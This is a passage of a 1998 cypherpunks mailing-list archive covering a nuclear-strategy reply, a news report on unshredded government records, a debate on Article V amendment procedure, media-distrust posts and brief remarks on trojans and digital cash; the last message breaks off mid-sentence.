To prevent this, you suggest scenario B: a preventative attack against
Russia. I think that your scenario has a higher mathematical expectation
of the number of american deaths than waiting to see if Russians attack
first.

Under scenario B, attack on Russia is a 100% probability event. The
conditional probability of a counterattack is high as well, with the
probability higher (in my judgment) than the probability of a _accidental_
unprovoked attack in scenario A. The conditional expectation of the number
of warheads reaching their targets, assuming that it is a authorized
retaliatory strike, is again higher (in my opinion) than the number of
warheads that would be launched accidentally.

What his means is that scenario B has a higher expectation of american
fatalities. I do not see a point in doing this.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Thu, 26 Nov 1998 04:58:51 +0800
To: "e$@vmeng.com" <e$@vmeng.com>,       "Sporting Shooters Association of Australia" <Martin.P@parl.gc.ca>
Subject: Fwd: "A MASSIVE BREACH OF PRIVACY"
Message-ID: <199811252000.PAA24853@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



==================BEGIN FORWARDED MESSAGE==================
>From: "Breitkreuz, Garry - Assistant 1" <BreitG0@parl.gc.ca>

[Breitkreuz is an elected member of the Canadian Parliement (Reform Party)] 

>To: "'firearms digest'" <cdn-firearms-digest@sfn.saskatoon.sk.ca>
>Subject: "A MASSIVE BREACH OF PRIVACY"
>Date: Wed, 25 Nov 1998 12:07:23 -0500



PUBLICATION: 	Vancouver Sun 	
DATE: 	98.11.25 	
EDITION: 	FINAL 	
SECTION: 	News 	
PAGE: 	A1 / Front 	
BYLINE: 	Jeff Lee 	
SOURCE: 	Vancouver Sun 	

Feds fear data sold rather than shredded: Huge cache of sensitive
government documents uncovered in Burnaby. 

The federal government believes tonnes of highly-sensitive material,
including tax records, unemployment insurance claims and parole records
were sold intact by a Lower Mainland company that was supposed to shred
and recycle the material, The Vancouver Sun has learned. 
Federal agencies found more than 110 tonnes of unshredded files in a
Burnaby warehouse last July that were being offered for sale by <Golden>
West Document Shredding (1995) Inc. 
But they have been unable to determine what happened to nearly another
200 tonnes they know the company was given by National Archives, the
federal agency responsible for disposing of classified and
non-classified documents no longer required by the government. 
And the amount of confidential material sent to <Golden> West that
wasn't shredded may actually be much higher -- as much as 600 to 700
tonnes -- said sources who spoke on condition of anonymity, because the
company also obtained documents directly from a number of other
government departments . 
The RCMP's National Security Intelligence Service, which investigated
the security breach, believes all documents were sent to pulp mills for
recycling, even though they weren't shredded, Sergeant John Ward said. 
``We're quite sure that no national security issues were compromised, at
least from our investigation. But I can tell you that we are not happy
about this at all,'' he said, adding that the issue involved a massive
breach of privacy. 
But John Billings, a regional director of Public Works, said he can't
say for certain the material didn't fall into the hands of people who
might use it for improper purposes. 
Sources said confidential information such as social insurance numbers
has a commercial value in criminal circles and can be used for such
purposes as obtaining false identification. 
According to a public works memo obtained by The Sun, <Golden> West
apparently sold the material unshredded because it could get a higher
price per tonne than if it had to tear it into unreadable strips as
required under the terms of its contract. 
Les Billett, the owner of <Golden> West, denied Tuesday he sold any
confidential documents intact. He said his company couldn't handle the
volume of material the government provided. 
Billett said only a small part of the 110 tonnes seized came from the
government. He said most of it was commercial office paper and estimated
that only 20 or so tonnes was government records. 
But Ward said police confirmed all of the material seized came from the
government, and that it was indeed being offered for sale unshredded. 
Many of the nearly 22,000 boxes sent for destruction contained what the
government calls ``designated'' or protected confidential information
originating from Revenue Canada, Citizenship and Immigration, Human
Resources, National Parole Board, Indian and Northern Affairs, and a
number of other departments. 
The RCMP was also among the agencies whose confidential documents were
found in the tonnes of material seized, he said. Most were low-level
security records from various detachments, as well as the E Division
headquarters, he said. 
<Golden> West's contract called for the company to obtain, shred and
recycle 400 tonnes of material from the National Archives warehouse in
Burnaby over a one-year period. It would also get up to 450 tonnes of
material directly from other agencies. 
In return, <Golden> West was supposed to pay the government $30.17 for
every tonne it took. Records show public works received at least $7,282,
meaning <Golden> West paid for about 241 tonnes of documents, Billings
said. 
But lading bills at the federal storage centre show <Golden> West
actually received 292 tonnes, not including any material obtained
directly from other agencies. 



===================END FORWARDED MESSAGE===================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 26 Nov 1998 05:12:15 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: How to reign the federal government in...
Message-ID: <199811252030.OAA30458@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Start a political party, but the likes of which has never walked the face of
the Earth.

The individual states when acting in a clear majority (>=75%) may pass
Constitutional amendments without the involvement or interference of federal
processes.

The IRS, for example, could be shut down tomorrow or significantly modified
via this mechanism without involvement at the federal level.

What is needed is a political party that has a representative site in each
state capital. Their job is to get proposed amendments to the Constitution
on the floor of each body for vote.

Think nationaly, act by state.

There could be no appeal to the Supreme Court for constitutionality because
it IS the Constitution.

There are no requirements in the Constitution to notify or otherwise
register such acts with the federal authorities. In short, it's none of
their business if the people acting at the state level change the laws at
the federal level. They must either comply or quit their jobs.



    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Thu, 26 Nov 1998 04:42:48 +0800
To: "Sporting Shooters Association of Australia" <Martin.P@parl.gc.ca>,       "e$@vmeng.com" <e$@vmeng.com>
Subject: Interesting tidbit about media controlling and censoring opinions, Web Polls data manipulated, etc.
Message-ID: <199811252000.PAA24863@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 24 Nov 1998 16:03:53 -0600, Ed "Saipan" D. (via CFD V2#714) wrote:

>Date: Tue, 24 Nov 1998 11:48:13 -0600
>From: dongres <dongres@manitouwadge.lakeheadu.ca>
>Subject: Anne MacLelland has promised

[several paragraph snipped]


[THE FOLLOWING REVEALS A VERY DISTRUBING TENDENCY.  JFA.]
[snip]
>The problem now is missinformation. Public forums
>that generaly shows we are in the majority, are being removed while media incresed
>their pitch. You may have noticed the latest one on Sympatico showed 85% against
>gun control and 15% for it. Now set for 0% to 0%, while sysop says he didn't
>noticed and his female helper ("webmistress") emailed me that there's "no any
>conspiracy" even 'though I never suggested there's any to beggin with. When I
>asked Angus Reids Poll info about their gun control poll they said that they know
>only what is on their website. (And that one wasn't there) They asked me who ever
>mention such poll!!! (as if it didn't existed?) Maybe it does maybe it doesn't. I
>haven't seen the evidence yet. "That's all I'm saying" (to put it in Randy Scott's
>words ;-)

[THE FOLLOWING IS IS A VERY INTERESTING OBSERVATION... JFA. ]

>See, we have to work on demystifying all the "news" we are getting and NEVER TAKE
>ANY at face value. Did you noticed often on the news they show a "talking head"
>with the sound off and CBC own comentator narates what has been said. This is to
>train us to get used to it (communist regime trick I've seen so often) so they can
>put anything to anybody's mouth when needed - and sometimes they do already.
>Nothing new under the Sun.

[large snip]

>Ed "Saipan" D.
>/\/\/\/\/\/\/\/\/\/\/\






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Todd Larason <jtl@molehill.org>
Date: Thu, 26 Nov 1998 07:23:25 +0800
To: Jim Choate <cypherpunks@EINSTEIN.ssz.com>
Subject: Re: Article V - an analysis
In-Reply-To: <199811252258.QAA31290@einstein.ssz.com>
Message-ID: <19981125145946.A9497@molehill.org>
MIME-Version: 1.0
Content-Type: text/plain



On 981125, Jim Choate wrote:
> Or when Congress is directed by 2/3 of the state legislatures a convention
> can be called for *proposing* amendments

Note that although it's clear that this is only for proposing amendments, our
history leaves some doubt that's what would actually happen.  The current
constitution came ouf of a constitutional convention called under the Articles 
of Confederation to discuss amendments, but was finally enacted under
procedures *it* specified, not the procedures specified in the Articles.

> The only sticky wicket I see is the ...proposed by Congress. Does this mean
> that Congress can decide which of the two it will recognize? 

Historically, Congress has always specified, at the time it proposes the
amendments.  I believe all but the repeal of prohibition were handled using
the legislature method.
-- 
ICQ UIN: 125844100




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Thu, 26 Nov 1998 07:35:42 +0800
To: Tim May <cypherpunks@cyberpass.net
Subject: Bank record privacy
In-Reply-To: <365C3CDB.6F34@lsil.com>
Message-ID: <4.1.19981125144737.03a03cf0@gabber.c2.net>
MIME-Version: 1.0
Content-Type: text/plain



At 01:31 PM 11/25/98 -0800, Tim May wrote:

>I'm not approving of the Feds examining the records of banks, only noting
>that the Fourth is not implicated here. From what I know of the law.
>
>(Legal beagles would probably mutter about a penumbra of the Fourth, an
>expectation of privacy, etc.)

No quibbles from me, Tim is correct. Bank record privacy for individuals
and small (< 5 partners) partnerships is governed by the Financial Privacy
Act of 1978 (12 USC 3401 et seq). I've got a short discussion of it online
as part of a larger (and incomplete) survey of federal privacy statutes at
<http://www.parrhesia.com/fedpriv.html>. There are cites to a few of the
bigger/older bank record privacy cases there, if people are interested in
reading further. 

Don't expect confidentiality against the government from a US-chartered
(federal or state) financial institution; you may be able to extract money
from the bank following a disclosure which didn't conform to the
complicated rules for disclosures, but banks are in the business of keeping
cops and shareholders, not customers, happy. There's no real risk that
customers will switch banks because of poor privacy policies because
they've all got the same policies. 

As a general rule, there's no protected/significant expectation of privacy
in information which is disclosed to third parties, absent a special
relationship which would preserve that privacy. The class of special
relationships (roughly, spouse, attorney, doctor, minister) is based on
history/custom and legislation, so you can't create a new one just because
you want to - not even with a contract, because the other party can be
compelled to disclose the information (despite the contract) by subpoena or
via a search warrant. (The Fifth Amendment would only bar such compelled
disclosure if the information tended to incriminate the disclosing party,
and the disclosing party were a natural person, not a corporation.) 


--
Greg Broiles        |History teaches that 'Trust us'
gbroiles@netbox.com |is no guarantee of due process.
                    |_Kasler v. Lundgren_, 98 CDOS 1581
                    |(March 4, 1998)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Todd Larason <jtl@molehill.org>
Date: Thu, 26 Nov 1998 07:48:02 +0800
To: Jim Choate <cypherpunks@EINSTEIN.ssz.com>
Subject: Re: Article V - an analysis (fwd)
In-Reply-To: <199811252312.RAA31545@einstein.ssz.com>
Message-ID: <19981125151157.B9497@molehill.org>
MIME-Version: 1.0
Content-Type: text/plain



On 981125, Jim Choate wrote:
> Why is this problematic? When the convention was called it was with the
> express goal of replacing the articles. A tacit a priori admission they were
> faulty and needed replacement.

But that wasn't the goal, at least not the stated goal.  The Convention
was called under the procedures specified in the Articles.  The Convention
itself decided to change the rules for ratification.

> > Historically, Congress has always specified, at the time it proposes the
> > amendments.  I believe all but the repeal of prohibition were handled using
> > the legislature method.
> 
> Did Congress accept the prohibition amendments without a priori specifying
> their submission and implimentation mechanism?

Congress specified in both (all) cases.  For the original prohibition
amendment, they submitted it to state legislatures.  For the repeal amendment, 
they submitted it to state conventions.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Todd Larason <jtl@molehill.org>
Date: Thu, 26 Nov 1998 08:09:17 +0800
To: Cypherpunks Distributed Remailer <cypherpunks@EINSTEIN.ssz.com>
Subject: Re: Article V - an analysis (fwd)
In-Reply-To: <199811252328.RAA31856@einstein.ssz.com>
Message-ID: <19981125153435.C9497@molehill.org>
MIME-Version: 1.0
Content-Type: text/plain



On 981125, Jim Choate wrote:
> > > Why is this problematic? 

Whether it's problematic or not depends on your goals.  It gives reason to
doubt that your interpretation of the effects of a Convention called under the 
current constitution would hold, as (as you now say), such a Convention
has the power to change the rules by definition.
 
>It's important to remember as well
> that the original Constitution had to be ratified by all 13 original states
> and not simply 3/4 of them. The choice was unanimous.

It didn't have to be:

Article. VII.

The Ratification of the Conventions of nine States, shall be 
sufficient for the Establishment of this Constitution between the States 
so ratifying the same.


There was a time period (I don't know how long, but certainly no more than
a few months) where some states were operating underthe Constitution and
others were still under the Acts.

> So, however the bill get's to Congress they must specify a method for the
> states to enact. Now the question is how long does Congress get? 

I don't think it specifies, but what has always happened is that the *same
resolution* which proposes the amendment specifies which ratification method
will be used.

> If Congress
> sits around and does nothing can it stall long enough that they can kill the
> amendment process by their own internal procedures? 

There's only a time limit because Congress has started specifying one, in the
same resolution which proposes the amendment and specifies the ratification
method.  (Exception: in the case of the ERA, I believe they later extended the
limit).  The power to specify a time limit isn't mentioned in the Constitution 
as you note, but has also never been tested.
-- 
ICQ UIN: 45940202




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nilsphone@aol.com
Date: Thu, 26 Nov 1998 05:15:28 +0800
To: Martin.P@parl.gc.ca, e$@vmeng.com
Subject: Re: Interesting tidbit about media controlling and censoringopinions, Web Pol...
Message-ID: <4d95422.365c6a69@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



I have noticed something else: 

Our networks (NBC, ABC, CBS etc) will interview a politician, on camera, 
and then immediately afterwards tell the viewers/listeners WHAT HE SAID!

I am not talking about commentary, extrapolations, consequences, comparison
with other opinions, commantaries about the truth or falsehood of what whas
said,
no, the TVnetspeakcritter will  say "Well, we heard President Ougadougou
Cleptocrate 
say that....." even when the interviewee spoke English, or was dubbed. 

Bye the way, for reasons related to those in the original mail, I much prefer
subtitles to dubbing, as the speaker's voice gives away many clues, even if I
am unfamiliar with his language.

Regards

Nils Andersson

>[THE FOLLOWING IS IS A VERY INTERESTING OBSERVATION... JFA. ]

>See, we have to work on demystifying all the "news" we are getting and NEVER
TAKE
>ANY at face value. Did you noticed often on the news they show a "talking
head"
>with the sound off and CBC own comentator narates what has been said. This is
to
>train us to get used to it (communist regime trick I've seen so often) so
they can
>put anything to anybody's mouth when needed - and sometimes they do already.
>Nothing new under the Sun.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 26 Nov 1998 06:12:36 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Intellectual Property is like a banana (McNealy)
Message-ID: <199811252140.PAA30769@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://www.cadence.com/features/vol3No3/mc_nealy

> Do We Worry Too Much About Protecting IP?
> 
>    --> By Scott McNealy 
>    
>    It seems as if everyone's always worried about intellectual property,
>    or IP. We worry about its proprietary nature and how to protect it.
>    But let's take a different angle on IP and also intellectual capital
>    inside a company, because I think we all worry way too much about
>    protecting it.
>    
>    IP has the shelf life of a banana. It just doesn't last, yet we're all
>    worried about protecting it, hiding it, securing it, storing it in a
>    vault. As a result, we absolutely prevent our competitors from getting
>    ahold of it, but we also prevent our employees from getting ahold of
>    it. We prevent our customers - and our suppliers and our partners -
>    from getting access to it. As a result, by the time the people who
>    need access to it get that access, it's so old that it is effectively
>    a banana we wouldn't want to eat.

[text deleted]


    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 25 Nov 1998 23:47:18 +0800
To: cypherpunks@toad.com
Subject: Nuts & Bolts: the ultimate trojan horse
Message-ID: <199811251509.QAA22018@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




At 11:30 PM 11/24/98 -0800, Tom Jud - US 5-200 Sales wrote:
>
>Call Today 
>To Receive A FREE Nuts & Bolt's '98 CD!

What a perfect Trojan cover.  A program that's *supposed* to 
scan your disk, and *supposed* to dial home for "updates".

And its free, too!








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 26 Nov 1998 06:59:45 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: How to reign the federal government in... (fwd)
Message-ID: <199811252222.QAA31143@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 25 Nov 1998 22:53:06 +0000
> From: "Douglas L. Peterson" <fnorky@chisp.net>
> Subject: Re: How to reign the federal government in...

> As per Article V, two thirds of the States can call a Convention to
> propose Amendments. I believe this would be 33 of our current 50 states. 
> Territories and other holding would have no say in this.  At this point,
> if three fourths of the states agree to any proposed Amendments, it becomes
> the law of the land.
> 
> We only need two thirds of the States to start the process, but this
> must be done by their Legislatures.

Which is exactly what I said. The goal of the party would be to get proposed
amendments on the floor each state legislature for vote.

> > The IRS, for example, could be shut down tomorrow or significantly modified
> > via this mechanism without involvement at the federal level.
> 
> I assume this would be either by nullifying Amendment 15 or modifying it
> to a great degree.  Nothing else would work.

That's the way I see it as well, which is the point after all. 

> > What is needed is a political party that has a representative site in each
> > state capital. Their job is to get proposed amendments to the Constitution
> > on the floor of each body for vote.
> 
> Actually, it would not be to get the proposed amendments on the floor. You
> would be putting the proposal for a Convention to amend the Constitution
> on the floor.  In addition, depending on the State, the party would likely
> need to have a member elected to that States Legislature.

Actualy it is. The Convention is only to create the amendment, the actual
vote takes place in the state legislatures, not the convention.

> That is why Article V was written as it was.  It provides a backdoor to
> keep the federal government from getting out of control.

Absolutely. Now, let's kick the beggar in!



    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 26 Nov 1998 07:28:59 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Article V - an analysis
Message-ID: <199811252258.QAA31290@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



				ARTICLE V. 
 
	[Constitution: how amended; proviso.] 
 
	The Congress, whenever two thirds of both Houses shall deem it 
necessary, shall propose Amendments to this Constitution, or, on the 
Application of the Legislatures of two thirds of the several States, shall 
call a Convention for proposing Amendments, which, in either Case, shall be 
valid to all Intents and Purposes, as Part of this Constitution, when ratified 
by the Legislatures of three fourths of the several States, or by Conventions 
of the three fourths thereof, as the one or the other Mode of Ratification 
may be proposed by the Congress; Provided that no Amendment which shall be 
made prior to the Year One thousand eight hundred and eight shall in any 
Manner affect the first and fourth Clauses in the Ninth Section of the first 
Article; and that no State, without its Consent, shall be deprived of it's 
equal Suffrage in the Senate. 

 --------------------------------------------------------------------------- 

The Congress can propose amendments if 2/3 of both houses agree

Or when Congress is directed by 2/3 of the state legislatures a convention
can be called for *proposing* amendments

Irrespective of which of the above two processes causes an amendment to be
considered a part of the Constitution when 3/4 of the state legislatures
vote for it, or by the constitutional conventions called in 3/4 of the state
agree on it. The decision of which method to use may be *proposed* by
Congress.

It's after 1808 and we're not considering state representation in the
Senate so I'll skip the last two phrases.

 ---------------------------------------------------------------------------

The only sticky wicket I see is the ...proposed by Congress. Does this mean
that Congress can decide which of the two it will recognize? Or does it mean
that Congress can merely express its desire? Or does this apply only to the
bills that were developed in the Congress? There's no time line for Congress
to decide, could this be used to hinder such a process?

Note that it's important to recognize that we're talking about 3/4n
conventions and not a single convention attended by 3/4n representatives of
the states. The tense of the sentence leaves no doubt.


    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Thu, 26 Nov 1998 09:35:40 +0800
To: cypherpunks@cyberpass.net
Subject: Maturity Is Needed
Message-ID: <f87fb627a29de8ccda3d32ce8ce6922c@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



In response to:                                     cyp

>Jim Choate is so stupid that even when he accidentally gets something
>right, he quickly "corrects" himself so that he is wrong again:
>
>> I had typed x/ln(x) as the asymptotic limit for the number of primes less
>> than x.
>> 
>> This is incorrect. It should be,
>> 
>> x/log(x)

>>Wrong, doofus.  x/ln(x) is the correct asymptotic limit.  What role could
>>logs to the base 10 possibly play?  Do you think God favors the number 10?
>>What a fool you are!Your observations over the years usually seemed 
>>thoughtful, and intelligent, and therefore helpful.

What an human waste this guy is. It reminds me of the 
old days of Reputation. A boorish attack reflects
more poorly on the attacker than the victim, if it is 
an inappropriate attack. Even if stupid, or just mistkaen, 
a comment here is intended toward a larger, instructive 
purpose. This idiot just wastes bandwidth.

Life's too short for this crap. Perhaps it's worth 
trying to reason with people a bit:

Victorian times, like ours today, were a period of huge 
changes, which meant behavioral changes. It cannot be 
an accident that manners, good form, and respectable 
society merged into the legendary image of modern social 
graces. It was done of efficiency, and, so, of necessity.

Inefficient entities decay in capitalism. Manners were 
needed for efficiency. Only today do they seem quaint, 
or insulting of class or social station. They were 
where the action was, among professionals trying to forge 
new economic relationships.

This immature jerk is gonna lose.

An Educated Observer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 26 Nov 1998 07:36:07 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Article V - an analysis (fwd)
Message-ID: <199811252312.RAA31545@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 25 Nov 1998 14:59:46 -0800
> From: Todd Larason <jtl@molehill.org>
> Subject: Re: Article V - an analysis

> Note that although it's clear that this is only for proposing amendments, our
> history leaves some doubt that's what would actually happen.  The current
> constitution came ouf of a constitutional convention called under the Articles 
> of Confederation to discuss amendments, but was finally enacted under
> procedures *it* specified, not the procedures specified in the Articles.

Why is this problematic? When the convention was called it was with the
express goal of replacing the articles. A tacit a priori admission they were
faulty and needed replacement.

Now, why would they ratify the new Constitution under the old rules in such
a situation? They wouldn't. One day the old rules apply, the next day the
new rules apply. It makes more sense to ask folks to recognize the new rules
under their own aegis than some problematic hold-over. No, the intent of the
Constitution was to intentionaly break the ties with the status quo and
precedence.

> Historically, Congress has always specified, at the time it proposes the
> amendments.  I believe all but the repeal of prohibition were handled using
> the legislature method.

Did Congress accept the prohibition amendments without a priori specifying
their submission and implimentation mechanism?


    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 26 Nov 1998 07:56:59 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Article V - an analysis (fwd)
Message-ID: <199811252328.RAA31856@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 25 Nov 1998 15:11:57 -0800
> From: Todd Larason <jtl@molehill.org>
> Subject: Re: Article V - an analysis (fwd)

> On 981125, Jim Choate wrote:
> > Why is this problematic? When the convention was called it was with the
> > express goal of replacing the articles. A tacit a priori admission they were
> > faulty and needed replacement.
> 
> But that wasn't the goal, at least not the stated goal.  The Convention
> was called under the procedures specified in the Articles.  The Convention
> itself decided to change the rules for ratification.

Which is by definition within the powers of such a convention. Their charter
is to come together in order to build a consensus and create from that a
charter for future operations. The litmus test is whether the states are
willing enough to go along with it to actualy do it. They were so the point
was moot. The states called the convention in order to create new proposals
for government, the convention went back to the states with a proposal, the
states looked it over and voted for it. It's important to remember as well
that the original Constitution had to be ratified by all 13 original states
and not simply 3/4 of them. The choice was unanimous.

> Congress specified in both (all) cases.  For the original prohibition
> amendment, they submitted it to state legislatures.  For the repeal amendment, 
> they submitted it to state conventions.

So, however the bill get's to Congress they must specify a method for the
states to enact. Now the question is how long does Congress get? If Congress
sits around and does nothing can it stall long enough that they can kill the
amendment process by their own internal procedures? There is certainly no
time limit imposed by the Constitution so the implication is that Congress
has to wait until the states decide whether that takes a day or a century.
But at the same token there is no implicit time constraint on Congress
either.


    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Todd Larason <jtl@molehill.org>
Date: Thu, 26 Nov 1998 09:57:28 +0800
To: "Douglas L. Peterson" <cypherpunks@Algebra.COM>
Subject: Re: Article V - an analysis (fwd)
In-Reply-To: <199811252328.RAA31856@einstein.ssz.com>
Message-ID: <19981125173059.A10113@molehill.org>
MIME-Version: 1.0
Content-Type: text/plain



On 981126, Douglas L. Peterson wrote:
> The Articles of Confederation 
> Article XIII.
> 
> ... And the Articles of this Confederation shall
> be inviolably observed by every state, and the union shall be
> perpetual; nor shall any alteration at any time hereafter be made
> in any of them; unless such alteration be agreed to in a Congress
> of the United States, and be afterwards confirmed by the legislatures
> of every State.

> The convention, the States, and the current Congress did as was
> required under Article XIII.

The Convention did not.  It produced a document which, by ITS rules, went
into effect after having been ratified by 9 of 13 states, not all 13 as
required by Article XIII.
-- 
ICQ UIN: 55350095




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Thu, 26 Nov 1998 10:22:07 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Maturity Is Needed
Message-ID: <7ef9c8cd7e2dd595bbaa7feafa5a775d@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



In response to:                                     ein

>Jim Choate is so stupid that even when he accidentally gets something
>right, he quickly "corrects" himself so that he is wrong again:
>
>> I had typed x/ln(x) as the asymptotic limit for the number of primes less
>> than x.
>> 
>> This is incorrect. It should be,
>> 
>> x/log(x)

>>Wrong, doofus.  x/ln(x) is the correct asymptotic limit.  What role could
>>logs to the base 10 possibly play?  Do you think God favors the number 10?
>>What a fool you are!Your observations over the years usually seemed 
>>thoughtful, and intelligent, and therefore helpful.

What an human waste this guy is. It reminds me of the 
old days of Reputation. A boorish attack reflects
more poorly on the attacker than the victim, if it is 
an inappropriate attack. Even if stupid, or just mistkaen, 
a comment here is intended toward a larger, instructive 
purpose. This idiot just wastes bandwidth.

Life's too short for this crap. Perhaps it's worth 
trying to reason with people a bit:

Victorian times, like ours today, were a period of huge 
changes, which meant behavioral changes. It cannot be 
an accident that manners, good form, and respectable 
society merged into the legendary image of modern social 
graces. It was done of efficiency, and, so, of necessity.

Inefficient entities decay in capitalism. Manners were 
needed for efficiency. Only today do they seem quaint, 
or insulting of class or social station. They were 
where the action was, among professionals trying to forge 
new economic relationships.

This immature jerk is gonna lose.

An Educated Observer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 26 Nov 1998 10:52:02 +0800
To: cypherpunks@cyberpass.net
Subject: the economist on cybercash
Message-ID: <199811260230.SAA07169@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



on disappointing/lackluster acceptance of digital
cash.. mondex,visa,1st virtual,digicash etc

http://www.economist.com/editorial/freeforall/current/index_fn7557.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 26 Nov 1998 08:52:57 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Article V - an analysis (fwd)
Message-ID: <199811260035.SAA32058@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 25 Nov 1998 15:34:35 -0800
> From: Todd Larason <jtl@molehill.org>
> Subject: Re: Article V - an analysis (fwd)

> On 981125, Jim Choate wrote:
> > > > Why is this problematic? 
> 
> Whether it's problematic or not depends on your goals.  It gives reason to
> doubt that your interpretation of the effects of a Convention called under the 
> current constitution would hold, as (as you now say), such a Convention
> has the power to change the rules by definition.

How? Explain what part of Article V leaves this hole open. Explain the
relevance of the operational proceedures used during the transition from the
Articles to the current Constitution to the modification of the Constitution
itself within the bounds of its own structure? Congress wasn't even involved
in that original process because it didn't technicaly exist until after the
ratification. Why would a precedence involving state legislatures be found
to hold on a national legislature? There is also the issue that the
Constitution once duly implimented is the supreme law of the land and it
takes precedence over precedence.

This is apples and oranges.

Bottem line, if 3/4 of the states ratify there isn't anything that keeps it
from being law. The most that Congress can say is whether it's a direct vote
in the legislature or a vote by convention.

> There was a time period (I don't know how long, but certainly no more than
> a few months) where some states were operating underthe Constitution and
> others were still under the Acts.

Which is relevant how?

> I don't think it specifies, but what has always happened is that the *same
> resolution* which proposes the amendment specifies which ratification method
> will be used.

That can't work if the resolution comes from the states. Only Congress has
the authority to decide that issue. So the only way a proposed amendment can
be placed up for debate and at the same time specify how it is to be voted
on at the state level is if it comes from Congress in the first place. A
